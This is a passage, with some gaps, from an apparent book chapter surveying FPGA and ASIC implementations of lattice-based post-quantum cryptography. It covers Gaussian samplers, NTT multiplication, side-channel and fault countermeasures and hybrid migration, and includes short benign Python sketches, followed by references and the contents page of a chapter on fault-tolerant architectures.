and, as previously mentioned, the use of the convolution property to reduce the size of the pre-computed tables. To implement the CDT approach in constant time, Pöppelmann and Güneysu (2013) proposed comparing the input value against all table entries using parallel comparators. Howe et al. (2018) instead recommended using a binary search algorithm to reach the required value in the CDT table, resulting in a very lightweight and yet constant-time alternative that outperforms the design of Pöppelmann and Güneysu (2013) by a factor of around 5× in terms of Ops/s/S (operations per second per slice).
2. Bernoulli Sampling: Bernoulli sampling is rejection sampling optimised using the Bernoulli distribution. Oder et al. (2014) compared the Bernoulli, Knuth-Yao and Ziggurat Gaussian sampling methods on a Cortex-M4F microcontroller, concluding that Bernoulli performs better than Knuth-Yao and Ziggurat in terms of both memory requirements and speed. The Bernoulli sampler is leaky in terms of timing; to achieve constant time, it has to perform many more comparisons (Howe et al. 2018) than the designs previously proposed in the literature.
3. Knuth-Yao Sampling: Roy et al. (2013) proposed a hardware design of Knuth-Yao sampling for use in LWE encryption schemes. The proposed optimisations include the implementation of a discrete distribution generating tree, optimised storage of the probability matrix, and column-wise compression of the zeros in the probability matrix. The Knuth-Yao random walk does not operate in constant time and is slow due to its bit-by-bit scanning. Howe et al. (2018) suggested a pre-calculation that improves the Ops/s/S of Knuth-Yao sampling by a factor of 2. Both of these implementations are non-constant-time and therefore vulnerable to timing attacks; Roy et al. (2014) proposed random shuffling of samples to counter such attacks.
4. Discrete Ziggurat Sampling: Buchmann et al. (2013) proposed a C++ implementation with several optimisations and compared Ziggurat with alternative sampling methods, showing that Ziggurat is suitable when large standard deviations are required. Discrete Ziggurat sampling has a non-constant running time. The only hardware implementation (which was also constant-time), proposed in Howe et al. (2018), showed that despite requiring a large amount of area resources, the discrete Ziggurat sampler generally offers a higher throughput.
5. Binomial Sampling: More recently, most lattice-based cryptographic schemes requiring narrow Gaussian distributions use binomial distribution-based sampling techniques. A reduction using the Rényi divergence (Takashima and Takayasu 2015) shows that using a binomial distribution instead of a rounded continuous Gaussian distribution does not provide an attacker with a significant advantage. To sample from a binomial distribution, one counts and subtracts the Hamming weights of two random bit vectors (see the sketch after this list). For small standard deviations (commonly used in lattice-based encryption schemes but not in signature schemes), this approach leads to very efficient samplers that do not require any pre-computed tables and run in constant time. For larger standard deviations, however, the binomial sampler suffers from long running times, since the length of the bit strings increases as the square of the standard deviation.
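As an illustration of the last point, the following minimal Python sketch draws one sample from a centered binomial distribution by differencing the Hamming weights of two random bit strings. It is illustrative only; the parameter value is an assumption, and production samplers are implemented in constant-time hardware or C rather than Python.

```python
import secrets

def centered_binomial_sample(eta: int) -> int:
    # One sample from the centered binomial distribution CBD_eta.
    bits = secrets.randbits(2 * eta)   # 2*eta uniform random bits
    a = bits & ((1 << eta) - 1)        # first eta bits
    b = bits >> eta                    # remaining eta bits
    # Difference of Hamming weights; sigma = sqrt(eta / 2), so the
    # bit length grows with the square of the standard deviation.
    # For fixed eta the work per call is the same on every run.
    return bin(a).count("1") - bin(b).count("1")

# Illustrative parameter: eta = 2 gives sigma = 1.0
print([centered_binomial_sample(2) for _ in range(8)])
```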
Fig. 4 Graphical performance results of all proposed discrete Gaussian samplers, on the Spartan-
6 LX25-3 FPGA, with and without RAM use. All results are time-independent unless otherwise
stated (Time-Dep.) (Howe et al. 2018)
In Howe et al. (2018), a thorough investigation of all the practical discrete Gaussian samplers (CDT, Knuth-Yao, Bernoulli and discrete Ziggurat) used in lattice-based cryptosystems is carried out. Novel time-independent implementations are presented, ensuring resistance against timing attacks; the designs also focus on a low area footprint and high throughput. A survey of all FPGA-based implementations reported to date is presented and analysed, with the proposed hardware sampler designs clearly outperforming most of the previously proposed samplers. Figure 4 plots the post-PAR results for the CDT, Knuth-Yao (KY), Bernoulli (Ber) and discrete Ziggurat (DZigg) samplers, both with and without the use of RAMs, targeted to the same FPGA device. For encryption, where a design does not use any RAM, the discrete Ziggurat sampler (DZigg_Enc) is the fastest, offering approximately 97 million operations per second, but with a large area requirement. However, the RAM-free CDT (CDT_Enc) sampler surpasses all others in terms of an overall balanced performance across area, throughput and timing independence. If the use of additional BRAMs is considered, the time-independent Knuth-Yao implementation (KY_Enc_RAM) has the best overall performance in terms of low area, high throughput and also the lowest number of bits required per sample. For signatures, the RAM-free CDT implementation (CDT_Sign) proves to be the overall winner, followed by the discrete Ziggurat sampler (DZigg_Sign) and the Bernoulli sampler (Ber_Sign); the latter, although around 2× more expensive in terms of slices, boasts a better throughput per slice.
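For concreteness, the CDT approach discussed above can be sketched as a binary search over a cumulative table. The table below is a hypothetical 16-bit toy; production samplers use far larger, higher-precision tables to bound the statistical distance, and the hardware designs replace the search with a fixed tree of comparators.

```python
import bisect
import secrets

# Hypothetical 8-entry cumulative distribution table (CDT), scaled to
# 16-bit fixed point; entries are illustrative placeholders only.
CDT = [25231, 48022, 60100, 64662, 65486, 65530, 65535, 65536]

def cdt_sample_magnitude() -> int:
    u = secrets.randbits(16)   # uniform 16-bit integer
    # Fixed-depth binary search: the same number of comparisons on
    # every call, which is what makes the method constant-time
    # friendly. A further random bit would choose the sample's sign.
    return bisect.bisect_right(CDT, u)
```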
Polynomial Multiplication
In the context of polynomial multiplication, selecting either standard (LWE), module (M-LWE) or ideal (R-LWE) lattices in lattice-based constructions has a significant impact on the system's efficiency. Optimised strategies for polynomial multiplication have therefore been one of the core interests of the research community. For hardware designs, the modulus q dictates the size of the multiplier or multipliers (i.e. log2(q)-bit) required in a hardware design of a cryptosystem using any class of lattices. It should be noted that hardware designs of lattice-based cryptosystems using LWE or M-LWE rather than R-LWE cannot be considered low-area, due to the inherently large key sizes required in such cryptosystems. However, matrix-vector multiplication is a traditional digital signal processing (DSP) task, and there are dedicated, optimised DSP hardware units available on FPGAs that can be targeted to accelerate these operations. This could improve the efficiency of LWE/M-LWE hardware designs requiring matrix-vector computations. Moreover, the number of parallel multipliers used in a design determines the area-throughput trade-off for various applications ranging from lightweight to high-speed networks.
has 8 LUTs per slice as compared to Spartan-6 (S-6) and Kintex-7 (K-7). A design with radix-2 butterfly units took 3.72 μs (Du et al. 2016). In one of the more recent works, Feng et al. (2020) achieved 0.94 μs for just a polynomial multiplication with a fully parallel multi-lane radix-2 NTT based on the Stockham NTT for n = 256, whereas pipelined NTT architectures reported in Chen et al. (2020) and Huang et al. (2020), targeting the M-LWE scheme CRYSTALS-Kyber with matrix dimension l = 2, attained 52.92 and 11.8 μs, respectively, for the polynomial multiplication part only.
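To illustrate why the NTT is the workhorse here, the following Python sketch multiplies two polynomials in Z_q[x]/(x^n + 1), the negacyclic ring used by R-LWE/M-LWE schemes. The toy parameters (q = 17, n = 8) are assumptions chosen so that q ≡ 1 (mod 2n), and the O(n^2) transforms stand in for the O(n log n) butterfly networks (Cooley-Tukey, Stockham) used in the hardware designs above.

```python
q, n = 17, 8  # toy parameters; a primitive 2n-th root of unity must exist

def find_psi():
    # smallest primitive 2n-th root of unity modulo q (g^n = -1 mod q)
    return next(g for g in range(2, q) if pow(g, n, q) == q - 1)

PSI = find_psi()
OMEGA = PSI * PSI % q

def ntt(a):
    # evaluate a(x) at the odd powers psi^(2i+1): the negacyclic NTT
    return [sum(a[j] * pow(PSI, (2 * i + 1) * j, q) for j in range(n)) % q
            for i in range(n)]

def intt(A):
    n_inv, psi_inv = pow(n, q - 2, q), pow(PSI, q - 2, q)
    omega_inv = pow(OMEGA, q - 2, q)
    return [(n_inv * pow(psi_inv, j, q)
             * sum(A[i] * pow(omega_inv, i * j, q) for i in range(n))) % q
            for j in range(n)]

def poly_mul(a, b):
    # pointwise product in the NTT domain = negacyclic convolution
    return intt([x * y % q for x, y in zip(ntt(a), ntt(b))])

# sanity check: x * x^7 = x^8 = -1 in Z_17[x]/(x^8 + 1)
assert poly_mul([0, 1] + [0] * 6, [0] * 7 + [1]) == [q - 1] + [0] * 7
```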
Timing Attacks
• Hiding de-correlates the data processed by the device from its power footprint. One way of doing this is ensuring constant power consumption; another is to shuffle the order of instruction execution, as undertaken in Roy et al. (2014). For ASIC- or FPGA-based implementations, on-device noise generation is easily done, making it harder for an attacker to read the power traces needed for an attack.
• Masking is a provable countermeasure in which a sensitive variable is processed as several shares, each computed on individually, so that an attacker cannot recover the secret value unless all the shares are known (see the sketch below). First-order masking splits the secret value into two shares. On R-LWE-based schemes, first-order masking comes at the cost of lowered performance (Reparaz et al. 2015; Oder et al. 2018). In Reparaz et al. (2015), first-order masking is applied to the secret key and the decoder, slowing decoding by up to 16× and increasing the decryption error probability by 19%. Oder et al. (2018) presented a masked CCA-secure R-LWE scheme with a masked binomial sampler and a masked encoder; Table 7 shows its performance on an ARM Cortex-M4 microcontroller. With the major overhead (71%) coming from binomial sampling, the overall performance overhead factor of the masking scheme is 5.7×.
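A minimal sketch of the share-splitting idea, assuming simple first-order arithmetic masking modulo an illustrative q; the modulus and operations are placeholders, not the masked R-LWE designs cited above.

```python
import secrets

q = 3329  # illustrative modulus; the idea is independent of the scheme

def mask(s: int):
    # first-order arithmetic masking: neither share alone reveals s
    s1 = secrets.randbelow(q)
    return s1, (s - s1) % q

def masked_add(x, y):
    # linear operations are applied share-wise, never recombining s
    return tuple((a + b) % q for a, b in zip(x, y))

def unmask(shares) -> int:
    return sum(shares) % q

assert unmask(masked_add(mask(1234), mask(42))) == (1234 + 42) % q
```

Non-linear steps (such as the binomial sampler or the decoder mentioned above) are the expensive part, since they cannot be applied share-wise and require dedicated masked gadgets.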
Fault Attacks
In a fault attack, the adversary purposely induces a fault and exploits the erroneous behaviour of the circuit to gain information about the secret values in the cryptosystem. A simple remedy is concurrent error detection (CED), generally undertaken via duplication of hardware or via re-computation on the same hardware, making it resource-expensive or lowering performance, respectively.
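The re-computation flavour of CED can be sketched as follows; the helper is hypothetical and not drawn from the cited works.

```python
def ced(op, *args):
    # temporal redundancy: recompute on the same hardware and compare;
    # spatial duplication would instead run two copies concurrently
    r1, r2 = op(*args), op(*args)
    if r1 != r2:
        raise RuntimeError("CED: mismatch, fault suspected")
    return r1

# usage: ced(lambda a, b: a + b, 2, 3)
```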
Numerous results have been reported in the context of fault attacks and countermeasures on lattice-based signatures: Bindel et al. (2016) investigated multiple lattice-based signature schemes, including the BLISS, ring-TESLA and GLP signatures, for randomisation, skipping and zeroing faults, and found several vulnerabilities in all of them. Ravi et al. (2019) presented a first-order skipping fault attack
• Most PQC schemes have larger key/signature sizes, and hence larger associated memory footprints/stack usages. This may prevent PQC schemes from being used as drop-in replacements for the currently used algorithms. Most widely used protocols, like X.509, IKE, TLS, SSH, etc., are designed with cryptographic agility in mind, i.e. they have the ability to accommodate larger key/signature size extensions. Protocols lacking this ability may require fundamental changes to their messaging and data structures to withstand quantum threats. Additionally, a larger transmission bandwidth is also required for PQC schemes.
In the context of PQC migration, the use of hybrid approaches employing both quantum-safe and classical public-key algorithms is advocated. An IETF draft (Stebila 2020) and technical reports (Crockett et al. 2019; Xu et al. 2020) provide the framework to integrate PQC alongside current ECC/RSA in the TLS and SSH protocols to provide potentially secure KEM/KEP. This hybrid approach will help maintain interoperability during the migration.
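The core of such hybrid key establishment can be sketched as a concatenate-then-KDF combiner. The hash choice and key sizes below are illustrative assumptions, not the exact constructions in the cited drafts.

```python
import hashlib
import secrets

def combine(k_classical: bytes, k_pqc: bytes) -> bytes:
    # concatenate-then-hash combiner: the derived session key stays
    # secret as long as at least one ingredient secret is unbroken
    return hashlib.sha3_256(k_classical + k_pqc).digest()

# stand-ins for an ECDH shared secret and a lattice-KEM shared secret
session_key = combine(secrets.token_bytes(32), secrets.token_bytes(32))
```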
In addition to the above, the term hybrid approach is also used for combining quantum and non-quantum schemes. Here, the quantum scheme refers to quantum key distribution (QKD), which is based on quantum mechanics. It enables Alice and Bob to generate shared symmetric keys securely, where the underpinning source of security is the communication of quantum light signals. The non-quantum schemes refer to the post-quantum cryptography (PQC) schemes that run on today's (classical) computing devices and are based on mathematical techniques immune to attack by Shor's algorithm, and hence deemed resistant to other quantum algorithms that may be developed in the future. A combination of PQC and QKD provides a solution that is very appealing in terms of security: if Alice and Bob seed a QKD session with fresh, asymmetric PQC, the quantum keys they establish will remain secure even if there are catastrophic failures due to advances in quantum computing, implementation vulnerabilities or evolving classical security failures (Dowling et al. 2020).
Conclusions
References
Ajtai M (1996) Generating hard instances of lattice problems. In: Proceedings of 28th annual ACM
symposium on theory of computing, pp 99–108
Ajtai M (1998) Worst-case complexity, average-case complexity and lattice problems. Doc Math J DMV III ICM:421–428
Ajtai M, Dwork C (1997) A public-key cryptosystem with worst-case/average-case equivalence. In: Proceedings of the twenty-ninth annual ACM symposium on theory of computing (STOC ’97). Association for Computing Machinery, New York, pp 284–293. https://doi.org/10.1145/258533.258604
Alkim E, Bindel N, Buchmann JA, Dagdelen Ö, Schwabe P (2015) Tesla: tightly-secure efficient
signatures from standard lattices. IACR Cryptology ePrint Archive, vol 2015, p 755
Aydin A, Cameron P, Patrick S (2013) Low-cost and area-efficient FPGA implementations
of lattice-based cryptography. In: 2013 IEEE international symposium on hardware-oriented
security and trust (HOST), pp 81–86
Banerjee U, Ukyab TS, Chandrakasan AP (2019) Sapphire: a configurable crypto-processor for
post-quantum lattice-based protocols. IACR Trans Cryptogr Hardw Embed Syst 2019:17–61
Barker W, Polk W, Souppaya M (2021a) Getting ready for post-quantum cryptography: exploring
challenges associated with adopting and using post-quantum cryptographic algorithms, NIST
Cybersecurity White Paper, p 10. [Online]. Available: https://doi.org/10.6028/NIST.CSWP.
04282021
Barker W, Consulting D, Souppaya M (2021b) Migration to post-quantum crytpography, NCCoE
Draft Project. [Online]. Available: https://www.nccoe.nist.gov/sites/default/files/library/project-
descriptions/pqc-migration-project-description-draft.pdf
Barrett P (1986) Implementing the Rivest Shamir and Adleman public key encryption algorithm
on a standard digital signal processor. In: Advances in cryptology – CRYPTO’86. Proceedings,
Santa Barbara. Springer, Berlin/Heidelberg, pp 311–323. [Online]. Available: https://doi.org/
10.1007/3-540-47721-7_24
Basu K, Soni D, Nabeel M, Karri R (2019) A resource-efficient and side-channel secure hardware
implementation of Ring-LWE cryptographic processor. In: NIST post-quantum cryptography –
a hardware evaluation study. Cryptology ePrint Archive, vol 2019. [Online]. Available: https://
eprint.iacr.org/2019/047
Bindel N, Buchmann J, Krämer J (2016) Lattice-based signature schemes and their sensitivity
to fault attacks. In: 2016 workshop on fault diagnosis and tolerance in cryptography (FDTC).
IEEE, pp 63–77
Blum A, Furst M, Kearns M, Lipton RJ (1994) Cryptographic primitives based on hard learning
problems. In: Stinson DR (ed) Advances in cryptology – CRYPTO’93. Springer, Berlin/Hei-
delberg, pp 278–291
Bos J, Ducas L, Kiltz E, Lepoint T, Lyubashevsky V, Schanck JM, Schwabe P, Seiler G, Stehlé D (2019) CRYSTALS-Kyber: a CCA-secure module-lattice-based KEM. Technical report, National Institute of Standards and Technology. [Online]. Available: https://pq-crystals.org/kyber/data/kyber-specification-round2.pdf
Braithwaite M (2016) Experimenting with post-quantum cryptography. https://security.googleblog.com/2016/07/experimenting-with-post-quantum.html
Buchmann J, Dahmen E, Hülsing A (2011) XMSS-a practical forward secure signature scheme
based on minimal security assumptions. In: International workshop on post-quantum cryptog-
raphy. Springer, pp 117–129
Buchmann JA, Cabarcas D, Göpfert F, Hülsing A, Weiden P (2013) Discrete ziggurat: a time-
memory trade-off for sampling from a Gaussian distribution over the integers. In: SAC 2013,
pp 402–417. [Online]. Available: https://doi.org/10.1007/978-3-662-43414-7_20
Chen Z, Ma Y, Chen T, Lin J, Jing J (2020) Towards efficient Kyber on FPGAs: a processor for
vector of polynomials. In: 25th Asia and South Pacific design automation conference (ASP-
DAC), pp 247–252
Cooley JW, Tukey JW (1965) An algorithm for the machine calculation of complex Fourier series. Math Comput 19:297–301
Crockett E, Paquin C, Stebila D (2019) Prototyping post-quantum and hybrid key exchange and
authentication in TLS and SSH. Cryptology ePrint Archive, Report 2019/858. https://eprint.iacr.
org/2019/858
Dang VB, Farahmand F, Andrzejczak M, Gaj K (2019) Implementing and benchmarking three
lattice-based post-quantum cryptography algorithms using software/hardware co-design. In:
2019 international conference on field-programmable technology (ICFPT), pp 206–214
Daniele M (2001) The hardness of the closest vector problem with preprocessing. IEEE Trans Inf
Theory 47(3):1212–1215
Daniele M, Oded R (2009) Lattice-based cryptography. In: Bernstein D, Buchmann J (eds) Post-
quantum cryptography. Springer, Berlin/Heidelberg
Ding J, Petzoldt A (2017) Current state of multivariate cryptography. IEEE Secur Priv 15(4):28–36
Dowling B, Hansen TB, Paterson KG (2020) Many a mickle makes a muckle: a framework for
provably quantum-secure hybrid key exchange. In: International conference on post-quantum
cryptography. Springer, pp 483–502
Ducas L (2014) Accelerating BLISS: the geometry of ternary polynomials. IACR cryptology ePrint
archive, vol 2014, p 874. [Online]. Available: http://eprint.iacr.org/2014/874
Ducas L, Durmus A, Lepoint T, Lyubashevsky V (2013) Lattice signatures and bimodal Gaussians.
In: Proceedings of annual cryptology conference – CRYPTO 2013. Springer, Berlin/Heidel-
berg, pp 40–56
Du C, Bai G, Wu X (2016) High-speed polynomial multiplier architecture for ring-lwe based public
key cryptosystems. In: 2016 international Great Lakes symposium on VLSI (GLSVLSI). IEEE,
pp 9–14
Du C, Bai G (2015) Towards efficient discrete Gaussian sampling for lattice-based cryptography.
In: 2015 25th international conference on field programmable logic and applications (FPL).
IEEE, pp 1–6
Dwarakanath NC, Galbraith SD (2014) Sampling from discrete Gaussians for lattice-based
cryptography on a constrained device. Appl Algebra Eng Commun Comput 25:159–180
Eisenbarth T, Kumar S, Paar C, Poschmann A, Uhsadel L (2007) A survey of lightweight-
cryptography implementations. IEEE Des Test Comput 24(6):522–533
Fan S, Liu W, Howe J, Khalid A, O’Neill M (2018) Lightweight hardware implementation of R-
LWE lattice-based cryptography. In: Proceedings of IEEE Asia Pacific conference on circuits
and systems (APCCAS), pp 403–406
Feng X, Li S, Xu S (2020) R-LWE-oriented high-speed polynomial multiplier utilizing multi-lane
stockham ntt algorithm. IEEE Trans Circuits Syst II: Express Briefs 67:556–559
Fritzmann T, Sepúlveda J (2019) Efficient and flexible low-power ntt for lattice-based cryptogra-
phy. In: 2019 IEEE international symposium on hardware oriented security and trust (HOST).
IEEE, pp 141–150
Fritzmann T, Sharif U, Müller-Gritschneder D, Reinbrecht C, Schlichtmann U, Sepulveda J (2019)
Towards reliable and secure post-quantum coprocessors based on RISC-V. In: 2019 design,
automation test in Europe conference exhibition (DATE), pp 1148–1153
Grover LK (1996) A fast quantum mechanical algorithm for database search. In: Proceedings of
28th annual ACM symposium on theory of computing. STOC’96. ACM, New York, pp 212–
219. [Online]. Available: https://doi.org/10.1145/237814.237866
Güneysu T, Krausz M, Oder T, Speith J (2018) Evaluation of lattice-based signature schemes in
embedded systems. In: 25th IEEE international conference on electronics, circuits and systems
(ICECS). IEEE, pp 385–388
Hoffstein J, Pipher J, Silverman JH (1998) NTRU: a ring-based public key cryptosystem. In:
Algorithmic number theory. Springer, Berlin/London, pp 267–288
Howe J, Khalid A, Rafferty C, Regazzoni F, O’Neill M (2016) On practical discrete Gaussian
samplers for lattice-based cryptography. IEEE Trans Comput 67(3):322–334
Howe J, Khalid A, Rafferty C, Regazzoni F, O’Neill M (2018) On practical discrete Gaussian
samplers for lattice-based cryptography. IEEE Trans Comput 67(3):322–334
McEliece RJ (1978) A public-key cryptosystem based on algebraic coding theory. DSN Progress Report 42-44, pp 114–116
McKay K, Bassham L, Sönmez Turan M, Mouha N (2016) Report on lightweight cryptography.
National Institute of Standards and Technology, Technical Report
Merkle RC (1989) A certified digital signature. In: Conference on the theory and application of
cryptology. Springer, pp 218–238
Micciancio D, Walter M (2017) Gaussian sampling over the integers: efficient, generic, constant-
time. In: Annual international cryptology conference. Springer, pp 455–485
Microsoft (2020) SHA-1 windows content to be retired August 3, 2020, Windows IT Pro
Blog. [Online]. Available: https://techcommunity.microsoft.com/t5/windows-it-pro-blog/sha-
1-windows-content-to-be-retired-august-3-2020/ba-p/1544373
Moody D (2016) Post-quantum cryptography: NIST’s plan for the future. In: Talk given at
PQCrypto 16 conference, Fukuoka. [Online]. Available: https://pqcrypto2016.jp/data/pqc2016_
nist_announcement.pdf
Nejatollahi H, Dutt ND, Banerjee I, Cammarota R (2018) Domain-specific accelerators for ideal
lattice-based public key protocols. IACR Cryptol. ePrint Archive, vol 2018, p 608
Niederreiter H, Xing C (2009) Algebraic geometry in coding theory and cryptography. Princeton
University Press, Princeton
NIST (2019) Status report on the first round of the NIST Post-Quantum Cryptography Standardiza-
tion Process. [Online]. Available: https://nvlpubs.nist.gov/nistpubs/ir/2019/NIST.IR.8240.pdf
NIST (2020) Status report on the second round of the NIST Post-Quantum Cryptography Standard-
ization Process. [Online]. Available: https://csrc.nist.gov/publications/detail/nistir/8309/final
Nussbaumer HJ (1981) The fast Fourier transform. In: Fast Fourier transform and convolution algorithms. Springer, Berlin/Heidelberg/New York, pp 80–111
Oder T, Pöppelmann T, Güneysu T (2014) Beyond ECDSA and RSA: lattice-based digital signa-
tures on constrained devices. In: 2014 51st ACM/EDAC/IEEE design automation conference
(DAC). IEEE, pp 1–6
Oder T, Güneysu T, Valencia F, Khalid A, O’Neill M, Regazzoni F (2016) Lattice-based
cryptography: from reconfigurable hardware to ASIC. In: 2016 international symposium on
integrated circuits (ISIC). IEEE, pp 1–4
Oder T, Schneider T, Pöppelmann T, Güneysu T (2018) Practical CCA2-secure and masked ring-
LWE implementation. IACR Trans Cryptogr Hardw Embed Syst 2018:142–174
Oder T, Speith J, Höltgen K, Güneysu T (2019) Towards practical microcontroller implementation
of the signature scheme Falcon. In: International conference on post quantum cryptography.
Springer, pp 1–17
Peikert C (2010) An efficient and parallel Gaussian sampler for lattices. In: International cryptool-
ogy conference – CRYPTO 2010. CRYPTO’10, Santa Barbara. Springer, Berlin/Heidelberg
Peikert C (2020) He gives C-sieves on the CSIDH. In: Annual international conference on the
theory and applications of cryptographic techniques. Springer, pp 463–492
Pessl P (2016) Analyzing the shuffling side-channel countermeasure for lattice-based signatures.
In: International conference on cryptology in India. Springer, pp 153–170
Pöppelmann T, Güneysu T (2013) Towards practical lattice-based public-key encryption on
reconfigurable hardware. In: Proceedings of international conference on selected areas in
cryptography, pp 68–85
Pöppelmann T, Güneysu T (2014) Area optimization of lightweight lattice-based encryption on
reconfigurable hardware. In: Proceedings of IEEE international symposium on circuits and
systems (ISCAS), pp 2796–2799
Pöppelmann T, Ducas L, Güneysu T (2014) Enhanced lattice-based signatures on reconfigurable
hardware. In: International workshop on cryptographic hardware and embedded systems.
Springer, pp 353–370
PQM4 (2018) Post-quantum cryptography on ARM Cortex-M4 family of microcontrollers.
[Online]. Available: https://github.com/mupq/pqm4
Ravi P, Jhanwar MP, Howe J, Chattopadhyay A, Bhasin S (2019) Exploiting determinism in
lattice-based signatures: practical fault attacks on pqm4 implementations of nist candidates.
In: Proceedings of the 2019 ACM Asia conference on computer and communications security,
pp 427–440
Regev O (2005) On lattices, learning with errors, random linear codes, and cryptography. In:
Proceedings of 37th annual ACM symposium on theory of computing (STOC), pp 84–93
Regev O (2010) The learning with errors problem (invited survey). In: Proceedings of of 25th
annual IEEE conference on computational complexity, CCC 2010, Cambridge, MA, pp 191–
204
Rentería-Mejía CP, Velasco-Medina J (2017) High-throughput Ring-LWE cryptoprocessors. IEEE
Trans VLSI Syst 25:2332–2345
Reparaz O, Roy SS, Vercauteren F, Verbauwhede I (2015) A masked ring-lwe implementation. In:
International workshop on cryptographic hardware and embedded systems. Springer, pp 683–
702
Roy SS, Basso A (2020) High-speed instruction-set coprocessor for lattice-based key encapsulation
mechanism: saber in hardware. In: TCHES, vol 4
Roy SS, Vercauteren F, Verbauwhede I (2013) High precision discrete Gaussian sampling on
FPGAs. In: International conference on selected areas in cryptography. Springer, pp 383–
401
Roy SS, Vercauteren F, Mentens N, Chen DD, Verbauwhede I (2014) Compact Ring-LWE
cryptoprocessor. In: Proceedings of international workshop on cryptographic hardware and
embedded systems, pp 371–391
Roy SS, Reparaz O, Vercauteren F, Verbauwhede I (2014) Compact and side channel secure
discrete Gaussian sampling. ePrint Report 2014/591. https://eprint.iacr.org/2014/591
Saarinen M-JO (2015) Gaussian sampling precision in lattice cryptography. Technical Report 953.
[Online]. Available: https://eprint.iacr.org/2015/953
Schneier B (2005) Cryptanalysis of SHA-1, Schneier on Security. [Online]. Available: https://
www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html
Shor PW (1994) Algorithms for quantum computation: discrete logarithms and factoring. In:
Proceedings of 35th annual symposium on foundations of computer science, pp 124–134
Song S, Tang W, Chen T, Zhang Z (2018) LEIA: a 2.05 mm² 140 mW lattice encryption instruction accelerator in 40 nm CMOS. In: 2018 IEEE custom integrated circuits conference (CICC). IEEE, pp 1–4
Standards EWC (2015) Quantum safe cryptography and security: an introduction, benefits,
enablers and challenges, White Paper No. 8
Stebila D (2020) Hybrid key exchange in TLS 1.3, Internet Engineering Task Force (IETF) draft
Steffen A, Willi M, Brunner T (2005) Strongswan IPSec project. http://www.strongswan.org
Takashima K, Takayasu A (2015) Tighter security for efficient lattice cryptography via the Rényi
divergence of optimized orders. In: Au M-H, Miyaji A (eds) Provable security. Lecture notes in
computer science. Springer International Publishing, pp 412–431. [Online]. Available: https://
doi.org/10.1007/978-3-319-26059-4_23
UM0586 (2018) STM32 cryptographic library. [Online]. Available: https://www.st.com/resource/
en/user_manual/cd00208802.pdf
Valencia F, Khalid A, O’Sullivan E, Regazzoni F (2017) The design space of the number theoretic
transform: a survey. In: Proceedings of international conference on embedded computer
systems: architectures, modeling, and simulation (SAMOS), pp 273–277
Wieschebrink C (2006) Two NP-complete problems in coding theory with an application in code
based cryptography. In: Proceedings of IEEE international symposium on information theory.
IEEE, pp 1733–1737
Xu J, Gao Y, Lim H (2020) Practical quantum-safe stateful hybrid key exchange protocol.
Cryptology ePrint Archive, Report 2020/763. https://eprint.iacr.org/2020/763
Yao K, Kundi D-S, Wang C, O’Neill M, Liu W (2021) Towards CRYSTALS-Kyber: a M-LWE
cryptoprocessor with area-time trade-off. In: Proceedings of IEEE international symposium on
circuits and systems (ISCAS), pp 1–5
Zhang Y, Wang C, Kundi D-S, Khalid A, O’Neill M, Liu W (2020) An efficient and parallel R-
LWE cryptoprocessor. IEEE Trans Circuits Syst II: Express Briefs 67(5):886–890
Fault Tolerant Architectures
9
Siva Satyendra Sahoo, Anup Das, and Akash Kumar
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
Faults, Errors, and Failures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281
Fault Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281
Fault Mechanisms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Fault Masking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 284
Reliability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286
Fault Tolerance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 289
Fault Tolerance Activities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
Redundancy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
Fault-Tolerant Computation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294
Single-Core Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294
Multicore Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 296
Reconfigurable Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 297
Fault-Tolerant Memory/Storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
Cache/On-chip SRAM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299
Main Memory/DRAM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299
Storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299
Fault-Tolerant On-Chip Communication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 300
Cross-Layer Reliability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 301
Domain-Specific Fault Tolerance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303
Fault Tolerance in Emerging Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304
Emerging Memory Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304
Reliability Issues in NVMs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 306
Fault Tolerance in AI/ML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
